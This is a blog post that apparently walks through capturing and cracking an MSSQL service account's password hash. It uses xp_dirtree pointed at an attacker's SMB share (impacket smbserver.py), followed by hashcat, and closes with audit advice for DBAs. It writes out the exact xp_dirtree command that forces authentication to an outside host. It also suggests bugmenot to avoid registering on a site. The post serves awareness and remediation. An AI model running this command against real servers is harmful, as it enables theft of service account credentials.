391 Followers
·
Follow

How to capture MSSQL credentials with xp_dirtree, smbserver.py and fix common MSSQL issues by @_markmo_

In security, we must show people how things can be misused before they take a threat seriously. Please note, this attack is not new, but it is new to me and I wanted to share what I learned as well as how to fix it.

First start smbserver.py (found here: https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py)

Image for post
Image for post

I setup a sample service account on a local machine to run my SQL process. DBA’s often use service accounts because they want the to be able to access a shared network drive. This is where things get REALLY INTERESTING!!!

Image for post
Image for post

Now I’ll connect with my local “Security” account. Tt really doesn’t matter which account I use, if the xp_dirtree is marked as PUBLIC, anyone can run this. Here is the cool part. It will run the command with the security context of the service account running the SQL server process!! So that’s the hash we will capture! My user account may not have awesome rights on the database, but the service account (SVC_MySvcAcct) I’m running does! Here is the command if you can’t read it from the image: EXEC master.sys.xp_dirtree ‘\\10.10.10.154\myshare’,1, 1

Image for post
Image for post

Once the command is executed we’ve captured our hash on our Kali box and it is the service account!

Image for post
Image for post

Now we write the hash to a file

Image for post
Image for post

and crack it with hashcat

Image for post
Image for post

Here is the password of the service account running my SQL server

Image for post
Image for post

How do we identify the problem and fix it? There is a fantastic free SQL audit script from SQL Server Central by Rudy Panigas here: http://www.sqlservercentral.com/articles/Audit/136459/ If you don’t want to sign up on SQL server central to download the script you “could” try this URL to get a password. http://bugmenot.com/view/sqlservercentral.com

Once you run it you will get some great output for your DBA. I ran this on a brand-new installation, so these values are defaults. At the top it shows what it checks for.

Image for post
Image for post

At the bottom, it shows the issues that need review.

Image for post
Image for post

In the middle it tells the DBA how and why tofix the issues it identifies.

Image for post
Image for post

When time permits I’ll do a write up on other insecure settings in SQL. I hope this finds you with a smile. Follow me on twitter @_markmo_

Written by

@_markmo_ on twitter

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store